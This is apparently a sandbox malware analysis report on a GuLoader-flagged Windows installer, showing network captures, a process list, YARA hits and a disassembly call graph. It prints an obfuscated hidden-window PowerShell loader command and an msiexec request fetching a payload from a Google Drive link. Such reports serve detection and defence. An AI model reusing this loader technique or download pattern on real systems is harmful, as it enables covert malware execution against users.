                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U26slU8asQoekPMP0SMdqQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          68192.168.2.650054142.250.185.1104435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:18 UTC418OUTGET /uc?export=download&id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Host: drive.google.com
                                                                                          Cache-Control: no-cache
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:18 UTC1920INHTTP/1.1 303 See Other
                                                                                          Content-Type: application/binary
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:18 GMT
                                                                                          Location: https://drive.usercontent.google.com/download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download
                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy: script-src 'nonce-h0WR5mcuLcC4DSF34hPPXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Server: ESF
                                                                                          Content-Length: 0
                                                                                          X-XSS-Protection: 0
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          X-Content-Type-Options: nosniff
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Connection: close


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          69192.168.2.650055216.58.206.654435692C:\Windows\SysWOW64\msiexec.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          2025-01-10 14:18:19 UTC460OUTGET /download?id=1dCdPObravzs21-oBd3j7tpvHPbFxz4tt&export=download HTTP/1.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                          Cache-Control: no-cache
                                                                                          Host: drive.usercontent.google.com
                                                                                          Connection: Keep-Alive
                                                                                          Cookie: NID=520=VrM5gvA8oWyKdGB_CNmnyzDjrR0svHfMQJl4AbkPQFrcraw-Xxdg25Id4TjMLFQHmqpYWq0dY6ajYcAK9GcTRqUdM3zk2AdTT-v6pgPdVRnmRGi1uoR4YDATgX69xFB4s-59Cpu4uNUZ-9EIJq3k5DL7C4T40msAq3oNPOVL5zrYwsCYYmc42jfi
                                                                                          2025-01-10 14:18:20 UTC1851INHTTP/1.1 404 Not Found
                                                                                          X-GUploader-UploadID: AFiumC49efzy5Jc1zUU9JX9-uzePxgCDNw7mjPjHzaytwcAUqt-u-IyH2CLBz47F_relOc1gMv5MMHU
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                          Pragma: no-cache
                                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                          Date: Fri, 10 Jan 2025 14:18:19 GMT
                                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                          Content-Security-Policy: script-src 'nonce-5JttNT0--xGjnb2pb2WQlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                          Content-Length: 1652
                                                                                          Server: UploadServer
                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                                          Connection: close
                                                                                          2025-01-10 14:18:20 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 4d 31 30 54 4b 78 50 56 75 74 47 76 64 78 59 4b 6e 6a 39 77 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uM10TKxPVutGvdxYKnj9wA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                          Statistics

                                                                                          CPU Usage

                                                                                          Click to jump to process

                                                                                          Memory Usage

                                                                                          Click to jump to process

                                                                                          High Level Behavior Distribution

                                                                                          Click to dive into process behavior distribution

                                                                                          Behavior

                                                                                          Click to jump to process

                                                                                          System Behavior

                                                                                          General

                                                                                          Target ID:0
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Users\user\Desktop\You7ynHizy.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\You7ynHizy.exe"
                                                                                          Imagebase:0x400000
                                                                                          File size:672'464 bytes
                                                                                          MD5 hash:98E8E7C349CBB65B53681757DC2959AE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:2
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"powershell.exe" -windowstyle hidden "$Eventyrromaners=Get-Content -raw 'C:\Users\user\AppData\Local\downrange\Stutteriers\samfrdselen\Celestaens.exo';$Uncrumbled=$Eventyrromaners.SubString(54209,3);.$Uncrumbled($Eventyrromaners)"
                                                                                          Imagebase:0x990000
                                                                                          File size:433'152 bytes
                                                                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2532691410.0000000009A59000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:3
                                                                                          Start time:09:16:14
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff66e660000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:8
                                                                                          Start time:09:16:52
                                                                                          Start date:10/01/2025
                                                                                          Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\syswow64\msiexec.exe"
                                                                                          Imagebase:0x130000
                                                                                          File size:59'904 bytes
                                                                                          MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000008.00000002.3375229817.0000000004F19000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:24.4%
                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                            Signature Coverage:20.5%
                                                                                            Total number of Nodes:1338
                                                                                            Total number of Limit Nodes:35
                                                                                            execution_graph 3007 401941 3008 401943 3007->3008 3013 402c41 3008->3013 3014 402c4d 3013->3014 3059 4062b9 3014->3059 3017 401948 3019 4059a9 3017->3019 3101 405c74 3019->3101 3022 4059d1 DeleteFileW 3024 401951 3022->3024 3023 4059e8 3025 405b13 3023->3025 3115 406297 lstrcpynW 3023->3115 3025->3024 3144 4065da FindFirstFileW 3025->3144 3027 405a0e 3028 405a21 3027->3028 3029 405a14 lstrcatW 3027->3029 3116 405bb8 lstrlenW 3028->3116 3030 405a27 3029->3030 3033 405a37 lstrcatW 3030->3033 3034 405a2d 3030->3034 3036 405a42 lstrlenW FindFirstFileW 3033->3036 3034->3033 3034->3036 3038 405b08 3036->3038 3057 405a64 3036->3057 3037 405b31 3147 405b6c lstrlenW CharPrevW 3037->3147 3038->3025 3041 405961 5 API calls 3044 405b43 3041->3044 3043 405aeb FindNextFileW 3045 405b01 FindClose 3043->3045 3043->3057 3046 405b47 3044->3046 3047 405b5d 3044->3047 3045->3038 3046->3024 3050 4052ff 24 API calls 3046->3050 3049 4052ff 24 API calls 3047->3049 3049->3024 3052 405b54 3050->3052 3051 4059a9 60 API calls 3051->3057 3054 40605d 36 API calls 3052->3054 3053 4052ff 24 API calls 3053->3043 3055 405b5b 3054->3055 3055->3024 3057->3043 3057->3051 3057->3053 3120 406297 lstrcpynW 3057->3120 3121 405961 3057->3121 3129 4052ff 3057->3129 3140 40605d MoveFileExW 3057->3140 3063 4062c6 3059->3063 3060 406511 3061 402c6e 3060->3061 3092 406297 lstrcpynW 3060->3092 3061->3017 3076 40652b 3061->3076 3063->3060 3064 4064df lstrlenW 3063->3064 3065 4062b9 10 API calls 3063->3065 3068 4063f4 GetSystemDirectoryW 3063->3068 3070 406407 GetWindowsDirectoryW 3063->3070 3071 40652b 5 API calls 3063->3071 3072 406482 lstrcatW 3063->3072 3073 40643b SHGetSpecialFolderLocation 3063->3073 3074 4062b9 10 API calls 3063->3074 3085 406165 3063->3085 3090 4061de wsprintfW 3063->3090 3091 406297 lstrcpynW 3063->3091 3064->3063 3065->3064 3068->3063 3070->3063 3071->3063 3072->3063 3073->3063 3075 406453 SHGetPathFromIDListW CoTaskMemFree 3073->3075 3074->3063 3075->3063 3083 406538 3076->3083 3077 4065ae 3078 4065b3 CharPrevW 3077->3078 3080 4065d4 3077->3080 3078->3077 3079 4065a1 CharNextW 3079->3077 3079->3083 3080->3017 3082 40658d CharNextW 3082->3083 3083->3077 3083->3079 3083->3082 3084 40659c CharNextW 3083->3084 3097 405b99 3083->3097 3084->3079 3093 406104 3085->3093 3088 4061c9 3088->3063 3089 406199 RegQueryValueExW RegCloseKey 3089->3088 3090->3063 3091->3063 3092->3061 3094 406113 3093->3094 3095 406117 3094->3095 3096 40611c RegOpenKeyExW 3094->3096 3095->3088 3095->3089 3096->3095 3099 405b9f 3097->3099 3098 405bb5 3098->3083 3099->3098 3100 405ba6 CharNextW 3099->3100 3100->3099 3150 406297 lstrcpynW 3101->3150 3103 405c85 3151 405c17 CharNextW CharNextW 3103->3151 3106 4059c9 3106->3022 3106->3023 3107 40652b 5 API calls 3113 405c9b 3107->3113 3108 405ccc lstrlenW 3109 405cd7 3108->3109 3108->3113 3110 405b6c 3 API calls 3109->3110 3112 405cdc GetFileAttributesW 3110->3112 3111 4065da 2 API calls 3111->3113 3112->3106 3113->3106 3113->3108 3113->3111 3114 405bb8 2 API calls 3113->3114 3114->3108 3115->3027 3117 405bc6 3116->3117 3118 405bd8 3117->3118 3119 405bcc CharPrevW 3117->3119 3118->3030 3119->3117 3119->3118 3120->3057 3157 405d68 GetFileAttributesW 3121->3157 3124 40598e 3124->3057 3125 405984 DeleteFileW 3127 40598a 3125->3127 3126 40597c RemoveDirectoryW 3126->3127 3127->3124 3128 40599a SetFileAttributesW 3127->3128 3128->3124 3130 40531a 3129->3130 3131 4053bc 3129->3131 3132 405336 lstrlenW 3130->3132 3133 4062b9 17 API calls 3130->3133 3131->3057 3134 405344 lstrlenW 3132->3134 3135 40535f 3132->3135 3133->3132 3134->3131 3136 405356 lstrcatW 3134->3136 3137 405372 3135->3137 3138 405365 SetWindowTextW 3135->3138 3136->3135 3137->3131 3139 405378 SendMessageW SendMessageW SendMessageW 3137->3139 3138->3137 3139->3131 3141 40607e 3140->3141 3142 406071 3140->3142 3141->3057 3160 405ee3 3142->3160 3145 4065f0 FindClose 3144->3145 3146 405b2d 3144->3146 3145->3146 3146->3024 3146->3037 3148 405b37 3147->3148 3149 405b88 lstrcatW 3147->3149 3148->3041 3149->3148 3150->3103 3152 405c34 3151->3152 3155 405c46 3151->3155 3154 405c41 CharNextW 3152->3154 3152->3155 3153 405c6a 3153->3106 3153->3107 3154->3153 3155->3153 3156 405b99 CharNextW 3155->3156 3156->3155 3158 40596d 3157->3158 3159 405d7a SetFileAttributesW 3157->3159 3158->3124 3158->3125 3158->3126 3159->3158 3161 405f13 3160->3161 3162 405f39 GetShortPathNameW 3160->3162 3187 405d8d GetFileAttributesW CreateFileW 3161->3187 3164 406058 3162->3164 3165 405f4e 3162->3165 3164->3141 3165->3164 3167 405f56 wsprintfA 3165->3167 3166 405f1d CloseHandle GetShortPathNameW 3166->3164 3169 405f31 3166->3169 3168 4062b9 17 API calls 3167->3168 3170 405f7e 3168->3170 3169->3162 3169->3164 3188 405d8d GetFileAttributesW CreateFileW 3170->3188 3172 405f8b 3172->3164 3173 405f9a GetFileSize GlobalAlloc 3172->3173 3174 406051 CloseHandle 3173->3174 3175 405fbc 3173->3175 3174->3164 3189 405e10 ReadFile 3175->3189 3180 405fdb lstrcpyA 3183 405ffd 3180->3183 3181 405fef 3182 405cf2 4 API calls 3181->3182 3182->3183 3184 406034 SetFilePointer 3183->3184 3196 405e3f WriteFile 3184->3196 3187->3166 3188->3172 3190 405e2e 3189->3190 3190->3174 3191 405cf2 lstrlenA 3190->3191 3192 405d33 lstrlenA 3191->3192 3193 405d3b 3192->3193 3194 405d0c lstrcmpiA 3192->3194 3193->3180 3193->3181 3194->3193 3195 405d2a CharNextA 3194->3195 3195->3192 3197 405e5d GlobalFree 3196->3197 3197->3174 3198 4015c1 3199 402c41 17 API calls 3198->3199 3200 4015c8 3199->3200 3201 405c17 4 API calls 3200->3201 3211 4015d1 3201->3211 3202 401631 3204 401663 3202->3204 3205 401636 3202->3205 3203 405b99 CharNextW 3203->3211 3207 401423 24 API calls 3204->3207 3225 401423 3205->3225 3215 40165b 3207->3215 3211->3202 3211->3203 3214 401617 GetFileAttributesW 3211->3214 3217 405868 3211->3217 3220 4057ce CreateDirectoryW 3211->3220 3229 40584b CreateDirectoryW 3211->3229 3213 40164a SetCurrentDirectoryW 3213->3215 3214->3211 3232 406671 GetModuleHandleA 3217->3232 3221 40581b 3220->3221 3222 40581f GetLastError 3220->3222 3221->3211 3222->3221 3223 40582e SetFileSecurityW 3222->3223 3223->3221 3224 405844 GetLastError 3223->3224 3224->3221 3226 4052ff 24 API calls 3225->3226 3227 401431 3226->3227 3228 406297 lstrcpynW 3227->3228 3228->3213 3230 40585b 3229->3230 3231 40585f GetLastError 3229->3231 3230->3211 3231->3230 3233 406697 GetProcAddress 3232->3233 3234 40668d 3232->3234 3236 40586f 3233->3236 3238 406601 GetSystemDirectoryW 3234->3238 3236->3211 3237 406693 3237->3233 3237->3236 3239 406623 wsprintfW LoadLibraryExW 3238->3239 3239->3237 3892 404344 lstrcpynW lstrlenW 3893 403945 3894 403950 3893->3894 3895 403957 GlobalAlloc 3894->3895 3896 403954 3894->3896 3895->3896 3897 401e49 3898 402c1f 17 API calls 3897->3898 3899 401e4f 3898->3899 3900 402c1f 17 API calls 3899->3900 3901 401e5b 3900->3901 3902 401e72 EnableWindow 3901->3902 3903 401e67 ShowWindow 3901->3903 3904 402ac5 3902->3904 3903->3904 3905 40264a 3906 402c1f 17 API calls 3905->3906 3914 402659 3906->3914 3907 402796 3908 4026a3 ReadFile 3908->3907 3908->3914 3909 405e10 ReadFile 3909->3914 3910 4026e3 MultiByteToWideChar 3910->3914 3911 402798 3927 4061de wsprintfW 3911->3927 3914->3907 3914->3908 3914->3909 3914->3910 3914->3911 3915 402709 SetFilePointer MultiByteToWideChar 3914->3915 3916 4027a9 3914->3916 3918 405e6e SetFilePointer 3914->3918 3915->3914 3916->3907 3917 4027ca SetFilePointer 3916->3917 3917->3907 3919 405e8a 3918->3919 3926 405ea2 3918->3926 3920 405e10 ReadFile 3919->3920 3921 405e96 3920->3921 3922 405ed3 SetFilePointer 3921->3922 3923 405eab SetFilePointer 3921->3923 3921->3926 3922->3926 3923->3922 3924 405eb6 3923->3924 3925 405e3f WriteFile 3924->3925 3925->3926 3926->3914 3927->3907 3931 4016cc 3932 402c41 17 API calls 3931->3932 3933 4016d2 GetFullPathNameW 3932->3933 3934 4016ec 3933->3934 3940 40170e 3933->3940 3936 4065da 2 API calls 3934->3936 3934->3940 3935 401723 GetShortPathNameW 3937 402ac5 3935->3937 3938 4016fe 3936->3938 3938->3940 3941 406297 lstrcpynW 3938->3941 3940->3935 3940->3937 3941->3940 3942 4043cd 3943 4044ff 3942->3943 3946 4043e5 3942->3946 3944 404569 3943->3944 3947 404633 3943->3947 3952 40453a GetDlgItem SendMessageW 3943->3952 3945 404573 GetDlgItem 3944->3945 3944->3947 3948 4045f4 3945->3948 3949 40458d 3945->3949 3950 40420e 18 API calls 3946->3950 3951 404275 8 API calls 3947->3951 3948->3947 3957 404606 3948->3957 3949->3948 3956 4045b3 SendMessageW LoadCursorW SetCursor 3949->3956 3953 40444c 3950->3953 3955 40462e 3951->3955 3975 404230 KiUserCallbackDispatcher 3952->3975 3954 40420e 18 API calls 3953->3954 3959 404459 CheckDlgButton 3954->3959 3979 40467c 3956->3979 3961 40461c 3957->3961 3962 40460c SendMessageW 3957->3962 3973 404230 KiUserCallbackDispatcher 3959->3973 3961->3955 3966 404622 SendMessageW 3961->3966 3962->3961 3963 404564 3976 404658 3963->3976 3966->3955 3968 404477 GetDlgItem 3974 404243 SendMessageW 3968->3974 3970 40448d SendMessageW 3971 4044b3 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 3970->3971 3972 4044aa GetSysColor 3970->3972 3971->3955 3972->3971 3973->3968 3974->3970 3975->3963 3977 404666 3976->3977 3978 40466b SendMessageW 3976->3978 3977->3978 3978->3944 3982 4058c3 ShellExecuteExW 3979->3982 3981 4045e2 LoadCursorW SetCursor 3981->3948 3982->3981 3983 40234e 3984 402c41 17 API calls 3983->3984 3985 40235d 3984->3985 3986 402c41 17 API calls 3985->3986 3987 402366 3986->3987 3988 402c41 17 API calls 3987->3988 3989 402370 GetPrivateProfileStringW 3988->3989 3990 401b53 3991 402c41 17 API calls 3990->3991 3992 401b5a 3991->3992 3993 402c1f 17 API calls 3992->3993 3994 401b63 wsprintfW 3993->3994 3995 402ac5 3994->3995 3996 404a55 3997 404a81 3996->3997 3998 404a65 3996->3998 4000 404ab4 3997->4000 4001 404a87 SHGetPathFromIDListW 3997->4001 4007 4058e1 GetDlgItemTextW 3998->4007 4003 404a9e SendMessageW 4001->4003 4004 404a97 4001->4004 4002 404a72 SendMessageW 4002->3997 4003->4000 4006 40140b 2 API calls 4004->4006 4006->4003 4007->4002 4008 401956 4009 402c41 17 API calls 4008->4009 4010 40195d lstrlenW 4009->4010 4011 402592 4010->4011 4012 4014d7 4013 402c1f 17 API calls 4012->4013 4014 4014dd Sleep 4013->4014 4016 402ac5 4014->4016 4017 401f58 4018 402c41 17 API calls 4017->4018 4019 401f5f 4018->4019 4020 4065da 2 API calls 4019->4020 4021 401f65 4020->4021 4023 401f76 4021->4023 4024 4061de wsprintfW 4021->4024 4024->4023 3822 402259 3823 402c41 17 API calls 3822->3823 3824 40225f 3823->3824 3825 402c41 17 API calls 3824->3825 3826 402268 3825->3826 3827 402c41 17 API calls 3826->3827 3828 402271 3827->3828 3829 4065da 2 API calls 3828->3829 3830 40227a 3829->3830 3831 40228b lstrlenW lstrlenW 3830->3831 3835 40227e 3830->3835 3833 4052ff 24 API calls 3831->3833 3832 4052ff 24 API calls 3836 402286 3832->3836 3834 4022c9 SHFileOperationW 3833->3834 3834->3835 3834->3836 3835->3832 3835->3836 3837 40175c 3838 402c41 17 API calls 3837->3838 3839 401763 3838->3839 3840 405dbc 2 API calls 3839->3840 3841 40176a 3840->3841 3842 405dbc 2 API calls 3841->3842 3842->3841 4025 401d5d GetDlgItem GetClientRect 4026 402c41 17 API calls 4025->4026 4027 401d8f LoadImageW SendMessageW 4026->4027 4028 401dad DeleteObject 4027->4028 4029 402ac5 4027->4029 4028->4029 4030 4022dd 4031 4022e4 4030->4031 4034 4022f7 4030->4034 4032 4062b9 17 API calls 4031->4032 4033 4022f1 4032->4033 4035 4058fd MessageBoxIndirectW 4033->4035 4035->4034 4036 401563 4037 402a6b 4036->4037 4040 4061de wsprintfW 4037->4040 4039 402a70 4040->4039 3245 4023e4 3246 402c41 17 API calls 3245->3246 3247 4023f6 3246->3247 3248 402c41 17 API calls 3247->3248 3249 402400 3248->3249 3262 402cd1 3249->3262 3252 402ac5 3253 402438 3254 402444 3253->3254 3286 402c1f 3253->3286 3257 402463 RegSetValueExW 3254->3257 3266 403116 3254->3266 3255 402c41 17 API calls 3258 40242e lstrlenW 3255->3258 3260 402479 RegCloseKey 3257->3260 3258->3253 3260->3252 3263 402cec 3262->3263 3289 406132 3263->3289 3267 40312f 3266->3267 3268 40315d 3267->3268 3296 403324 SetFilePointer 3267->3296 3293 40330e 3268->3293 3272 4032a7 3274 4032e9 3272->3274 3279 4032ab 3272->3279 3273 40317a GetTickCount 3275 403291 3273->3275 3282 4031a6 3273->3282 3276 40330e ReadFile 3274->3276 3275->3257 3276->3275 3277 40330e ReadFile 3277->3282 3278 40330e ReadFile 3278->3279 3279->3275 3279->3278 3280 405e3f WriteFile 3279->3280 3280->3279 3281 4031fc GetTickCount 3281->3282 3282->3275 3282->3277 3282->3281 3283 403221 MulDiv wsprintfW 3282->3283 3285 405e3f WriteFile 3282->3285 3284 4052ff 24 API calls 3283->3284 3284->3282 3285->3282 3287 4062b9 17 API calls 3286->3287 3288 402c34 3287->3288 3288->3254 3290 406141 3289->3290 3291 402410 3290->3291 3292 40614c RegCreateKeyExW 3290->3292 3291->3252 3291->3253 3291->3255 3292->3291 3294 405e10 ReadFile 3293->3294 3295 403168 3294->3295 3295->3272 3295->3273 3295->3275 3296->3268 3342 402868 3343 402c41 17 API calls 3342->3343 3344 40286f FindFirstFileW 3343->3344 3345 402897 3344->3345 3349 402882 3344->3349 3350 4061de wsprintfW 3345->3350 3347 4028a0 3351 406297 lstrcpynW 3347->3351 3350->3347 3351->3349 4041 401968 4042 402c1f 17 API calls 4041->4042 4043 40196f 4042->4043 4044 402c1f 17 API calls 4043->4044 4045 40197c 4044->4045 4046 402c41 17 API calls 4045->4046 4047 401993 lstrlenW 4046->4047 4049 4019a4 4047->4049 4048 4019e5 4049->4048 4053 406297 lstrcpynW 4049->4053 4051 4019d5 4051->4048 4052 4019da lstrlenW 4051->4052 4052->4048 4053->4051 4054 40166a 4055 402c41 17 API calls 4054->4055 4056 401670 4055->4056 4057 4065da 2 API calls 4056->4057 4058 401676 4057->4058 3352 40336c SetErrorMode GetVersion 3353 4033ab 3352->3353 3354 4033b1 3352->3354 3355 406671 5 API calls 3353->3355 3356 406601 3 API calls 3354->3356 3355->3354 3357 4033c7 lstrlenA 3356->3357 3357->3354 3358 4033d7 3357->3358 3359 406671 5 API calls 3358->3359 3360 4033de 3359->3360 3361 406671 5 API calls 3360->3361 3362 4033e5 3361->3362 3363 406671 5 API calls 3362->3363 3364 4033f1 #17 OleInitialize SHGetFileInfoW 3363->3364 3442 406297 lstrcpynW 3364->3442 3367 40343d GetCommandLineW 3443 406297 lstrcpynW 3367->3443 3369 40344f 3370 405b99 CharNextW 3369->3370 3371 403474 CharNextW 3370->3371 3372 40359e GetTempPathW 3371->3372 3382 40348d 3371->3382 3444 40333b 3372->3444 3374 4035b6 3375 403610 DeleteFileW 3374->3375 3376 4035ba GetWindowsDirectoryW lstrcatW 3374->3376 3454 402edd GetTickCount GetModuleFileNameW 3375->3454 3378 40333b 12 API calls 3376->3378 3381 4035d6 3378->3381 3379 405b99 CharNextW 3379->3382 3380 403624 3388 405b99 CharNextW 3380->3388 3424 4036c7 3380->3424 3437 4036d7 3380->3437 3381->3375 3383 4035da GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3381->3383 3382->3379 3384 403587 3382->3384 3386 403589 3382->3386 3387 40333b 12 API calls 3383->3387 3384->3372 3538 406297 lstrcpynW 3386->3538 3392 403608 3387->3392 3395 403643 3388->3395 3392->3375 3392->3437 3393 403811 3397 403895 ExitProcess 3393->3397 3398 403819 GetCurrentProcess OpenProcessToken 3393->3398 3394 4036f1 3548 4058fd 3394->3548 3402 4036a1 3395->3402 3403 403707 3395->3403 3399 403831 LookupPrivilegeValueW AdjustTokenPrivileges 3398->3399 3400 403865 3398->3400 3399->3400 3405 406671 5 API calls 3400->3405 3406 405c74 18 API calls 3402->3406 3407 405868 5 API calls 3403->3407 3408 40386c 3405->3408 3409 4036ad 3406->3409 3410 40370c lstrcatW 3407->3410 3413 403881 ExitWindowsEx 3408->3413 3416 40388e 3408->3416 3409->3437 3539 406297 lstrcpynW 3409->3539 3411 403728 lstrcatW lstrcmpiW 3410->3411 3412 40371d lstrcatW 3410->3412 3415 403744 3411->3415 3411->3437 3412->3411 3413->3397 3413->3416 3418 403750 3415->3418 3419 403749 3415->3419 3554 40140b 3416->3554 3417 4036bc 3540 406297 lstrcpynW 3417->3540 3423 40584b 2 API calls 3418->3423 3422 4057ce 4 API calls 3419->3422 3425 40374e 3422->3425 3426 403755 SetCurrentDirectoryW 3423->3426 3482 403987 3424->3482 3425->3426 3427 403770 3426->3427 3428 403765 3426->3428 3553 406297 lstrcpynW 3427->3553 3552 406297 lstrcpynW 